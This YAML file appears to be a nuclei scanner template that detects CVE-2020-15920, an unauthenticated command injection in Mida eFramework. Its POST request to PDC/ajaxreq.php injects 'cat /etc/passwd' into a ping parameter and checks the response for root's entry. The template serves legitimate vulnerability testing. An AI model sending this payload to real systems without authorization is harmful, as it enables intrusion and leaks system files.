nuclei-templates/cves/2020/CVE-2020-15920.yaml

29 lines
915 B
YAML

id: CVE-2020-15920
info:
name: Unauthenticated RCE at Mida eFramework on 'PDC/ajaxreq.php'
author: dwisiswant0
severity: critical
description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required.
reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
tags: cve,cve2020,mida,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-15920
cwe-id: CWE-78
requests:
- method: POST
path:
- "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body